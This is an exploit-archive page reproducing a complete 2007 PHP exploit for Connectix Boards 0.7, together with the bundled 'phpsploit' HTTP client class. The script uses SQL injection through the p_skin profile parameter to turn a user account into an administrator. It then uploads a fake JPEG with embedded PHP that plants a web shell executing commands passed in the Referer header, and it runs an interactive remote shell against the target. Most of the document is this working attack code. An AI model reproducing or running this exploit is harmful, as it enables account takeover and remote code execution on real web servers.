Lucene search
RootSSV:6224HistoryFeb 22, 2007 - 12:00 a.m.
Connectix Boards <= 0.7 (p_skin) Multiple Vulnerabilities Exploit
2007-02-2200:00:00
Root
www.seebug.org
13
No description provided by source.
#!/usr/bin/php
<?php
error_reporting(E_ALL ^ E_NOTICE);
if($argc < 9) {
print(\"
Connectix Boards <= 0.7 (p_skin) Multiple Vulnerabilities Exploit
-------------------------------------------------------------------
PHP conditions: none
Credits: DarkFig <[email protected]>
URL: http://www.acid-root.new.fr/
-------------------------------------------------------------------
Usage: $argv[0] -url <> -usr <> -pwd <> -type <> [Options]
Params: -url For example http://victim.com/connectix/
-usr The username of your account
-pwd The password of your account
-type Privilege Escalation(1) or Code execution(2)
Options: -proxy If you wanna use a proxy <proxyhost:proxyport>
-proxyauth Basic authentification <proxyuser:proxypwd>
-------------------------------------------------------------------
\"); exit(1);
}
$url = getparam(\'url\',1);
$user = getparam(\'usr\',1);
$pass = getparam(\'pwd\',1);
$type = getparam(\'type\',1);
$proxy = getparam(\'proxy\');
$authp = getparam(\'proxyauth\');
$theme = \'Zephyr\';
$xpl = new phpsploit();
$xpl->agent(\"Mozilla Firefox\");
$xpl->allowredirection(1);
$xpl->cookiejar(1);
if($proxy) $xpl->proxy($proxy);
if($authp) $xpl->proxyauth($authp);
print \"
Trying to get logged in\";
$xpl->post($url.\'index.php?act=login\',\"username=$user&password=$pass&remember=on&confirm=Connexion+%21\");
if(preg_match(\"#password#\",$xpl->showcookie())) print \"
Logged in\";
else exit(\"
Exploit failed\");
sploit(\", usr_class=1\");
if($type==1) exit(\"
Done, $user is now admin.\");
# Fake JPG (with php code) generated with edjpgcom.exe
#
# <?php $handle=fopen(\'mdrpipicacalolxdwtf.gif.php\',\'w+\');
# fwrite($handle,\'<?php @system($_SERVER[HTTP_REFERER]); ?/>\');
# fclose($handle); unlink($_SERVER[PHP_SELF]); ?/>
#
$f = \"xFFxD8xFFxE0x00x10x4Ax46x49x46x00x01x01x01x00x60x00x60x00x00xFF\"
.\"xDBx00x43x00x08x06x06x07x06x05x08x07x07x07x09x09x08x0Ax0Cx14\"
.\"x0Dx0Cx0Bx0Bx0Cx19x12x13x0Fx14x1Dx1Ax1Fx1Ex1Dx1Ax1Cx1Cx20x24\"
.\"x2Ex27x20x22x2Cx23x1Cx1Cx28x37x29x2Cx30x31x34x34x34x1Fx27x39\"
.\"x3Dx38x32x3Cx2Ex33x34x32xFFxDBx00x43x01x09x09x09x0Cx0Bx0Cx18\"
.\"x0Dx0Dx18x32x21x1Cx21x32x32x32x32x32x32x32x32x32x32x32x32x32\"
.\"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32\"
.\"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32xFFxFEx00\"
.\"xA5x3Cx3Fx70x68x70x20x24x68x61x6Ex64x6Cx65x3Dx66x6Fx70x65x6E\"
.\"x28x27x6Dx64x72x70x69x70x69x63x61x63x61x6Cx6Fx6Cx78x64x77x74\"
.\"x66x2Ex67x69x66x2Ex70x68x70x27x2Cx27x77x2Bx27x29x3Bx66x77x72\"
.\"x69x74x65x28x24x68x61x6Ex64x6Cx65x2Cx27x3Cx3Fx70x68x70x20x40\"
.\"x73x79x73x74x65x6Dx28x24x5Fx53x45x52x56x45x52x5Bx48x54x54x50\"
.\"x5Fx52x45x46x45x52x45x52x5Dx29x3Bx20x3Fx3Ex27x29x3Bx66x63x6C\"
.\"x6Fx73x65x28x24x68x61x6Ex64x6Cx65x29x3Bx20x75x6Ex6Cx69x6Ex6B\"
.\"x28x24x5Fx53x45x52x56x45x52x5Bx50x48x50x5Fx53x45x4Cx46x5Dx29\"
.\"x3Bx20x3Fx3ExFFxC0x00x11x08x00x01x00x01x03x01x22x00x02x11x01\"
.\"x03x11x01xFFxC4x00x1Fx00x00x01x05x01x01x01x01x01x01x00x00x00\"
.\"x00x00x00x00x00x01x02x03x04x05x06x07x08x09x0Ax0BxFFxC4x00xB5\"
.\"x10x00x02x01x03x03x02x04x03x05x05x04x04x00x00x01x7Dx01x02x03\"
.\"x00x04x11x05x12x21x31x41x06x13x51x61x07x22x71x14x32x81x91xA1\"
.\"x08x23x42xB1xC1x15x52xD1xF0x24x33x62x72x82x09x0Ax16x17x18x19\"
.\"x1Ax25x26x27x28x29x2Ax34x35x36x37x38x39x3Ax43x44x45x46x47x48\"
.\"x49x4Ax53x54x55x56x57x58x59x5Ax63x64x65x66x67x68x69x6Ax73x74\"
.\"x75x76x77x78x79x7Ax83x84x85x86x87x88x89x8Ax92x93x94x95x96x97\"
.\"x98x99x9AxA2xA3xA4xA5xA6xA7xA8xA9xAAxB2xB3xB4xB5xB6xB7xB8xB9\"
.\"xBAxC2xC3xC4xC5xC6xC7xC8xC9xCAxD2xD3xD4xD5xD6xD7xD8xD9xDAxE1\"
.\"xE2xE3xE4xE5xE6xE7xE8xE9xEAxF1xF2xF3xF4xF5xF6xF7xF8xF9xFAxFF\"
.\"xC4x00x1Fx01x00x03x01x01x01x01x01x01x01x01x01x00x00x00x00x00\"
.\"x00x01x02x03x04x05x06x07x08x09x0Ax0BxFFxC4x00xB5x11x00x02x01\"
.\"x02x04x04x03x04x07x05x04x04x00x01x02x77x00x01x02x03x11x04x05\"
.\"x21x31x06x12x41x51x07x61x71x13x22x32x81x08x14x42x91xA1xB1xC1\"
.\"x09x23x33x52xF0x15x62x72xD1x0Ax16x24x34xE1x25xF1x17x18x19x1A\"
.\"x26x27x28x29x2Ax35x36x37x38x39x3Ax43x44x45x46x47x48x49x4Ax53\"
.\"x54x55x56x57x58x59x5Ax63x64x65x66x67x68x69x6Ax73x74x75x76x77\"
.\"x78x79x7Ax82x83x84x85x86x87x88x89x8Ax92x93x94x95x96x97x98x99\"
.\"x9AxA2xA3xA4xA5xA6xA7xA8xA9xAAxB2xB3xB4xB5xB6xB7xB8xB9xBAxC2\"
.\"xC3xC4xC5xC6xC7xC8xC9xCAxD2xD3xD4xD5xD6xD7xD8xD9xDAxE2xE3xE4\"
.\"xE5xE6xE7xE8xE9xEAxF2xF3xF4xF5xF6xF7xF8xF9xFAxFFxDAx00x0Cx03\"
.\"x01x00x02x11x03x11x00x3Fx00xF7xFAx28xA2x80x3FxFFxD9\";
# +admin.bbcode.php
# |
# 95. if(isset($_POST[\'wherefile\'])) {
# 96. if ($_POST[\'wherefile\']==\'upload\') {
# 97. if (!empty($_FILES[\'uploadimage\'][\'size\'])){
# 98. if ($image=getimagesize(trim($_FILES[\'uploadimage\'][\'tmp_name\']))) {
# 99. $val = array(IMAGETYPE_GIF,IMAGETYPE_JPEG,IMAGETYPE_PNG);
# 100. if ($_FILES[\'uploadimage\'][\'size\'] <= 20480 && in_array($image[2],$val)) {
# 101. $filename = $smile->smiley_librariesdir.$_POST[\'sm_filenameserver\'];
# 102. $filename = str_replace(\'../\',\'\',trim($filename));
# 103. //si le filenameserver contient un dossier : on cr?e ce dossier:
# 104. mkdirs($smile->smiley_dir.dirname($filename));
# 105. if (move_uploaded_file($_FILES[\'uploadimage\'][\'tmp_name\'], $smile->smiley_dir.$_POST[\'sm_filenameserver\'])) {
# 106. $do=true;
# 107. }
#
$arr = array(frmdt_url => $url.\'admin.php?act=bb?=4\',
\"sm_name\" => \":AbCdEfGhIj1234dsupersmilepowaa:\",
\"sm_filenamesubdir\" => \"libraries/\",
\"sm_filenameserver\" => \"xd.gif.php\",
\"wherefile\" => \"upload\",
\"sm_send\" => \"Confirmer\",
\"uploadimage\" => array(frmdt_type => \"image/gif\",
frmdt_filename => \"xd.gif.php\",
frmdt_content => $f));
$xpl->formdata($arr);
$xpl->get($url.\"smileys/xd.gif.php\");
print \"
$shell> \";
while(!preg_match(\"#^(quit|exit)$#\",($cmd = trim(fgets(STDIN)))))
{
$xpl->addheader(\"Referer\",$cmd);
$xpl->get($url.\"smileys/mdrpipicacalolxdwtf.gif.php\");
print $xpl->getcontent().\"
$shell> \";
}
function sploit($sql)
{
global $url,$xpl,$theme,$user;
$pdat = \"changeparams=1\"
.\"&p_usrs=20\"
.\"&p_topics=20\"
.\"&p_msgs=15\"
.\"&p_res=12\"
.\"&p_skin=$theme\"
.\"%00\',usr_pref_skin=\'$theme\',usr_signature=(SELECT \'[XPL_IS_OK]\')$sql WHERE usr_name=\'$user\' #\"
.\"&p_lang=fr\"
.\"&p_timezone=1\";
# +common.php
# |
# 95. function cleanArray(&$arr) {
# 96. if (!empty($arr) && is_array($arr)) {
# 97. foreach($arr as $k => $v) {
# 98. if (is_array($v)) cleanArray($arr[$k]);
# 99. else $arr[$k] = stripslashes($v);
# 100. }
# 101. }
# 102. }
# |
# 105. if (get_magic_quotes_gpc()) {
# 106. cleanArray($_POST);
# 107. cleanArray($_COOKIE);
# 108. cleanArray($_GET);
# 109. }
#
# +part.userprofile.php
# |
# 305. /* Changement des param?tres d\'affichage (pas accessible par les modos ou admins) */
# 306. } elseif (isset($_POST[\'changeparams\']) && $edit_id==$_SESSION[\'userid\']) {
# 307. if ( isset($_POST[\'p_usrs\'],$_POST[\'p_topics\'],$_POST[\'p_msgs\'],$_POST[\'p_res\'],$_POST[\'p_skin\'],$_POST[\'p_lang\'],$_POST[\'p_timezone\']) ) {
# 308. if (is_numeric($_POST[\'p_usrs\']) && is_numeric($_POST[\'p_topics\']) && is_numeric($_POST[\'p_msgs\']) && is_numeric($_POST[\'p_res\']) && isLang($_POST[\'p_lang\']) && isSkin($_POST[\'p_skin\'])) {
# 309. if ((int)$_POST[\'p_usrs\']>=5 && (int)$_POST[\'p_usrs\']<=50 && (int)$_POST[\'p_topics\']>=5 && (int)$_POST[\'p_topics\']<=50 && (int)$_POST[\'p_msgs\']>=5 && (int)$_POST[\'p_msgs\']<=50 && (int)$_POST[\'p_res\']>=5 && (int)$_POST[\'p_res\']<=50 && in_array($_POST[\'p_timezone\'],array_keys($timezones))) {
# 310. $GLOBALS[\'cb_db\']->query(\"UPDATE \".$GLOBALS[\'cb_db\']->prefix.\"users SET usr_pref_msgs=\'\".(int)$_POST[\'p_msgs\'].\"\',usr_pref_usrs=\'\".(int)$_POST[\'p_usrs\'].\"\',usr_pref_topics=\'\".(int)$_POST[\'p_topics\'].\"\',usr_pref_res=\'\".(int)$_POST[\'p_res\'].\"\',usr_pref_lang=\'\".$_POST[\'p_lang\'].\"\',usr_pref_skin=\'\".$_POST[\'p_skin\'].\"\',usr_pref_timezone=\'\".$_POST[\'p_timezone\'].\"\',usr_pref_ctsummer=\".((int)(isset($_POST[\'p_ctsummer\']) && $_POST[\'p_ctsummer\']==\'on\')).\" WHERE usr_id=\".$_SESSION[\'cb_user\']->userid);
# 311. $_SESSION[\'cb_user\']->reloadnext=true;
# 312. redirect(manage_url(\'index.php?act=user&editprofile=\'.$_SESSION[\'userid\'].\'&page=6\',\'forum-profile\'.$_SESSION[\'userid\'].\'-params.html\'));
#
# +lib.cb.php
# |
# 117. function isLang ($langtype) {
# 118. return is_dir(CB_PATH.\'lang/\'.$langtype);
# 119. }
# |
# 133. function isSkin ($skintype) {
# 134. return is_dir(CB_PATH.\'skins/\'.$skintype);
# 135. }
$xpl->post($url.\"index.php?act=user&editprofile=-1&page=6\",$pdat);
$xpl->get($url.\"index.php?act=user&editprofile=-1&page=5\");
if(preg_match(\'#[XPL_IS_OK]#\',$xpl->getcontent())) return;
else exit(\"Exploit failed\");
}
function getparam($param,$opt=\'\')
{
global $argv;
foreach($argv as $value => $key)
{
if($key == \'-\'.$param) return $argv[$value+1];
}
if($opt) exit(\"
-$param parameter required\");
else return;
}
/*
*
* Copyright (C) darkfig
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License
* as published by the Free Software Foundation; either version 2
* of the License, or (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
*
* TITLE: PhpSploit Class
* REQUIREMENTS: PHP 5 (remove \"private\", \"public\" if you have PHP 4)
* VERSION: 1.2
* LICENSE: GNU General Public License
* ORIGINAL URL: http://www.acid-root.new.fr/tools/03061230.txt
* FILENAME: phpsploitclass.php
*
* CONTACT: [email protected] (french / english)
* GREETZ: Sparah, Ddx39
*
* DESCRIPTION:
* The phpsploit is a class implementing a web user agent.
* You can add cookies, headers, use a proxy server with (or without) a
* basic authentification. It supports the GET and the POST method. It can
* also be used like a browser with the cookiejar() function (which allow
* a server to add several cookies for the next requests) and the
* allowredirection() function (which allow the script to follow all
* redirections sent by the server). It can return the content (or the
* headers) of the request. Others useful functions can be used for debugging.
* A manual is actually in development but to know how to use it, you can
* read the comments.
*
* CHANGELOG:
* [2007-01-24] (1.2)
* * Bug #2 fixed: Problem concerning the getcookie() function ((|;))
* * New: multipart/form-data enctype is now supported
*
* [2006-12-31] (1.1)
* * Bug #1 fixed: Problem concerning the allowredirection() function (chr(13) bug)
* * New: You can now call the getheader() / getcontent() function without parameters
*
* [2006-12-30] (1.0)
* * First version
*
*/
class phpsploit {
/**
* This function is called by the get()/post() functions.
* You don\'t have to call it, this is the main function.
*
* @return $server_response
*/
private function sock()
{
if(!empty($this->proxyhost) && !empty($this->proxyport)) $socket = fsockopen($this->proxyhost,$this->proxyport);
else $socket = fsockopen($this->host,$this->port);
if(!$socket) die(\"Error: The host doesn\'t exist\");
if($this->method===\"get\") $this->packet = \"GET \".$this->url.\" HTTP/1.1
\";
elseif($this->method===\"post\" or $this->method===\"formdata\") $this->packet = \"POST \".$this->url. \" HTTP/1.1
\";
else die(\"Error: Invalid method\");
if(!empty($this->proxyuser)) $this->packet .= \"Proxy-Authorization: Basic \".base64_encode($this->proxyuser.\":\".$this->proxypass).\"
\";
$this->packet .= \"Host: \".$this->host.\"
\";
if(!empty($this->agent)) $this->packet .= \"User-Agent: \".$this->agent.\"
\";
if(!empty($this->header)) $this->packet .= $this->header.\"
\";
if(!empty($this->cookie)) $this->packet .= \"Cookie: \".$this->cookie.\"
\";
$this->packet .= \"Connection: Close
\";
if($this->method===\"post\")
{
$this->packet .= \"Content-Type: application/x-www-form-urlencoded
\";
$this->packet .= \"Content-Length: \".strlen($this->data).\"
\";
$this->packet .= $this->data.\"
\";
}
elseif($this->method===\"formdata\")
{
$this->packet .= \"Content-Type: multipart/form-data; boundary=---------------------------\".$this->boundary.\"
\";
$this->packet .= \"Content-Length: \".strlen($this->data).\"
\";
$this->packet .= $this->data;
}
$this->packet .= \"
\";
$this->recv = \'\';
fputs($socket,$this->packet);
while(!feof($socket)) $this->recv .= fgets($socket);
fclose($socket);
if($this->cookiejar) $this->cookiejar($this->getheader($this->recv));
if($this->allowredirection) return $this->allowredirection($this->recv);
else return $this->recv;
}
/**
* This function allows you to add several cookie in the
* request. Several methods are supported:
*
* $this->addcookie(\"name\",\"value\");
* or
* $this->addcookie(\"name=newvalue\");
* or
* $this->addcookie(\"othername=overvalue; xx=zz; y=u\");
*
* @param string $cookiename
* @param string $cookievalue
*
*/
public function addcookie($cookn,$cookv=\'\')
{
// $this->addcookie(\"name\",\"value\"); work avec replace
if(!empty($cookv))
{
if($cookv === \"deleted\") $cookv=\'\'; // cookiejar(1) && Set-Cookie: name=delete
if(!empty($this->cookie))
{
if(preg_match(\"/$cookn=/\",$this->cookie))
{
$this->cookie = preg_replace(\"/$cookn=(S*);/\",\"$cookn=$cookv;\",$this->cookie);
}
else
{
$this->cookie .= \" \".$cookn.\"=\".$cookv.\";\"; // \" \".
}
}
else
{
$this->cookie = $cookn.\"=\".$cookv.\";\";
}
}
// $this->addcookie(\"name=value; othername=othervalue\");
else
{
if(!empty($this->cookie))
{
$cookn = preg_replace(\"/(.*);$/\",\"$1\",$cookn);
$cookarr = explode(\";\",str_replace(\" \", \"\",$cookn));
for($i=0;$i<count($cookarr);$i++)
{
preg_match(\"/(S*)=(S*)/\",$cookarr[$i],$matches);
$cookn = $matches[1];
$cookv = $matches[2];
$this->addcookie($cookn,$cookv);
}
}
else
{
$cookn = ((substr($cookn,(strlen($cookn)-1),1))===\";\") ? $cookn : $cookn.\";\";
$this->cookie = $cookn;
}
}
}
/**
* This function allows you to add several headers in the
* request. Several methods are supported:
*
* $this->addheader(\"headername\",\"headervalue\");
* or
* $this->addheader(\"headername: headervalue\");
*
* @param string $headername
* @param string $headervalue
*/
public function addheader($headern,$headervalue=\'\')
{
// $this->addheader(\"name\",\"value\");
if(!empty($headervalue))
{
if(!empty($this->header))
{
if(preg_match(\"/$headern:/\",$this->header))
{
$this->header = preg_replace(\"/$headern: (S*)/\",\"$headern: $headervalue\",$this->header);
}
else
{
$this->header .= \"
\".$headern.\": \".$headervalue;
}
}
else
{
$this->header=$headern.\": \".$headervalue;
}
}
// $this->addheader(\"name: value\");
else
{
if(!empty($this->header))
{
$headarr = explode(\": \",$headern);
$headern = $headarr[0];
$headerv = $headarr[1];
$this->addheader($headern,$headerv);
}
else
{
$this->header=$headern;
}
}
}
/**
* This function allows you to use an http proxy server.
* Several methods are supported:
*
* $this->proxy(\"proxyip\",\"8118\");
* or
* $this->proxy(\"proxyip:8118\")
*
* @param string $proxyhost
* @param integer $proxyport
*/
public function proxy($proxy,$proxyp=\'\')
{
// $this->proxy(\"localhost:8118\");
if(empty($proxyp))
{
preg_match(\"/^(S*):(d+)$/\",$proxy,$proxarr);
$proxh = $proxarr[1];
$proxp = $proxarr[2];
$this->proxyhost=$proxh;
$this->proxyport=$proxp;
}
// $this->proxy(\"localhost\",8118);
else
{
$this->proxyhost=$proxy;
$this->proxyport=intval($proxyp);
}
if($this->proxyport > 65535) die(\"Error: Invalid port number\");
}
/**
* This function allows you to use an http proxy server
* which requires a basic authentification. Several
* methods are supported:
*
* $this->proxyauth(\"darkfig\",\"dapasswd\");
* or
* $this->proxyauth(\"darkfig:dapasswd\");
*
* @param string $proxyuser
* @param string $proxypass
*/
public function proxyauth($proxyauth,$proxypasse=\'\')
{
// $this->proxyauth(\"darkfig:password\");
if(empty($proxypasse))
{
preg_match(\"/^(.*):(.*)$/\",$proxyauth,$proxautharr);
$proxu = $proxautharr[1];
$proxp = $proxautharr[2];
$this->proxyuser=$proxu;
$this->proxypass=$proxp;
}
// $this->proxyauth(\"darkfig\",\"password\");
else
{
$this->proxyuser=$proxyauth;
$this->proxypass=$proxypasse;
}
}
/**
* This function allows you to set the \"User-Agent\" header.
* Several methods are possible to do that:
*
* $this->agent(\"Mozilla Firefox\");
* or
* $this->addheader(\"User-Agent: Mozilla Firefox\");
* or
* $this->addheader(\"User-Agent\",\"Mozilla Firefox\");
*
* @param string $useragent
*/
public function agent($useragent)
{
$this->agent=$useragent;
}
/**
* This function returns the header which will be
* in the next request.
*
* $this->showheader();
*
* @return $header
*/
public function showheader()
{
return $this->header;
}
/**
* This function returns the cookie which will be
* in the next request.
*
* $this->showcookie();
*
* @return $storedcookies
*/
public function showcookie()
{
return $this->cookie;
}
/**
* This function returns the last formed
* http request (the http packet).
*
* $this->showlastrequest();
*
* @return $last_http_request
*/
public function showlastrequest()
{
return $this->packet;
}
/**
* This function sends the formed http packet with the
* GET method. You can precise the port of the host.
*
* $this->get(\"http://localhost\");
* $this->get(\"http://localhost:888/xd/tst.php\");
*
* @param string $urlwithpath
* @return $server_response
*/
public function get($url)
{
$this->target($url);
$this->method=\"get\";
return $this->sock();
}
/**
* This function sends the formed http packet with the
* POST method. You can precise the port of the host.
*
* $this->post(\"http://localhost/index.php\",\"admin=1&user=dark\");
*
* @param string $urlwithpath
* @param string $postdata
* @return $server_response
*/
public function post($url,$data)
{
$this->target($url);
$this->method=\"post\";
$this->data=$data;
return $this->sock();
}
/**
* This function sends the formed http packet with the
* POST method using the multipart/form-data enctype.
*
* $array = array(
* frmdt_url => \"http://localhost/upload.php\",
* frmdt_boundary => \"123456\", # Optional
* \"email\" => \"[email protected]\",
* \"varname\" => array(
* frmdt_type => \"image/gif\", # Optional
* frmdt_transfert => \"binary\", # Optional
* frmdt_filename => \"hello.php\",
* frmdt_content => \"<?php echo \':)\'; ?>\"));
* $this->formdata($array);
*
* @param array $array
* @return $server_response
*/
public function formdata($array)
{
$this->target($array[frmdt_url]);
$this->method=\"formdata\";
$this->data=\'\';
if(!isset($array[frmdt_boundary])) $this->boundary=\"phpsploit\";
else $this->boundary=$array[frmdt_boundary];
foreach($array as $key => $value)
{
if(!preg_match(\"#^frmdt_(boundary|url)#\",$key))
{
$this->data .= \"-----------------------------\".$this->boundary.\"
\";
$this->data .= \"Content-Disposition: form-data; name=\"\".$key.\"\";\";
if(!is_array($value))
{
$this->data .= \"
\".$value.\"
\";
}
else
{
$this->data .= \" filename=\"\".$array[$key][frmdt_filename].\"\";
\";
if(isset($array[$key][frmdt_type])) $this->data .= \"Content-Type: \".$array[$key][frmdt_type].\"
\";
if(isset($array[$key][frmdt_transfert])) $this->data .= \"Content-Transfer-Encoding: \".$array[$key][frmdt_transfert].\"
\";
$this->data .= \"
\".$array[$key][frmdt_content].\"
\";
}
}
}
$this->data .= \"-----------------------------\".$this->boundary.\"--
\";
return $this->sock();
}
/**
* This function returns the content of the server response
* without the headers.
*
* $this->getcontent($this->get(\"http://localhost/\"));
* or
* $this->getcontent();
*
* @param string $server_response
* @return $onlythecontent
*/
public function getcontent($code=\'\')
{
if(empty($code)) $code = $this->recv;
$content = explode(\"
\",$code);
$onlycode = \'\';
for($i=1;$i<count($content);$i++)
{
if(!preg_match(\"/^(S*):/\",$content[$i])) $ok = 1;
if($ok) $onlycode .= $content[$i].\"
\";
}
return $onlycode;
}
/**
* This function returns the headers of the server response
* without the content.
*
* $this->getheader($this->post(\"http://localhost/x.php\",\"x=1&z=2\"));
* or
* $this->getheader();
*
* @param string $server_response
* @return $onlytheheaders
*/
public function getheader($code=\'\')
{
if(empty($code)) $code = $this->recv;
$header = explode(\"
\",$code);
$onlyheader = $header[0].\"
\";
for($i=1;$i<count($header);$i++)
{
if(!preg_match(\"/^(S*):/\",$header[$i])) break;
$onlyheader .= $header[$i].\"
\";
}
return $onlyheader;
}
/**
* This function is called by the cookiejar() function.
* It adds the value of the \"Set-Cookie\" header in the \"Cookie\"
* header for the next request. You don\'t have to call it.
*
* @param string $server_response
*/
private function getcookie($code)
{
$carr = explode(\"
\",str_replace(\"
\",\"
\",$code));
for($z=0;$z<count($carr);$z++)
{
if(preg_match(\"/set-cookie: (.*)/i\",$carr[$z],$cookarr))
{
$cookie[] = preg_replace(\"/expires=(.*)(GMT||UTC)(S*)$/i\",\"\",preg_replace(\"/path=(.*)/i\",\"\",$cookarr[1]));
}
}
for($i=0;$i<count($cookie);$i++)
{
preg_match(\"/(S*)=(S*)(|;)/\",$cookie[$i],$matches);
$cookn = $matches[1];
$cookv = $matches[2];
$this->addcookie($cookn,$cookv);
}
}
/**
* This function is called by the get()/post() functions.
* You don\'t have to call it.
*
* @param string $urltarg
*/
private function target($urltarg)
{
if(!preg_match(\"/^http://(.*)//\",$urltarg)) $urltarg .= \"/\";
$this->url=$urltarg;
$array = explode(\"/\",str_replace(\"http://\",\"\",preg_replace(\"/:(d+)/\",\"\",$urltarg)));
$this->host=$array[0];
preg_match(\"/:(d+)//\",$urltarg,$matches);
$this->port=empty($matches[1]) ? 80 : $matches[1];
$temp = str_replace(\"http://\",\"\",preg_replace(\"/:(d+)/\",\"\",$urltarg));
preg_match(\"//(.*)//\",$temp,$matches);
$this->path=str_replace(\"//\",\"/\",\"/\".$matches[1].\"/\");
if($this->port > 65535) die(\"Error: Invalid port number\");
}
/**
* If you call this function, the script will
* extract all \"Set-Cookie\" headers values
* and it will automatically add them into the \"Cookie\" header
* for all next requests.
*
* $this->cookiejar(1); // enabled
* $this->cookiejar(0); // disabled
*
*/
public function cookiejar($code)
{
if($code===0) $this->cookiejar=\'\';
if($code===1) $this->cookiejar=1;
else
{
$this->getcookie($code);
}
}
/**
* If you call this function, the script will
* follow all redirections sent by the server.
*
* $this->allowredirection(1); // enabled
* $this->allowredirection(0); // disabled
*
* @return $this->get($locationresponse)
*/
public function allowredirection($code)
{
if($code===0) $this->allowredirection=\'\';
if($code===1) $this->allowredirection=1;
else
{
if(preg_match(\"/(location|content-location|uri): (.*)/i\",$code,$codearr))
{
$location = str_replace(chr(13),\'\',$codearr[2]);
if(!eregi(\"://\",$location))
{
return $this->get(\"http://\".$this->host.$this->path.$location);
}
else
{
return $this->get($location);
}
}
else
{
return $code;
}
}
}
/**
* This function allows you to reset some parameters:
*
* $this->reset(header); // headers cleaned
* $this->reset(cookie); // cookies cleaned
* $this->reset(); // clean all parameters
*
* @param string $func
*/
public function reset($func=\'\')
{
switch($func)
{
case \"header\":
$this->header=\'\';
break;
case \"cookie\":
$this->cookie=\'\';
break;
default:
$this->cookiejar=\'\';
$this->header=\'\';
$this->cookie=\'\';
$this->allowredirection=\'\';
$this->agent=\'\';
break;
}
}
}
?>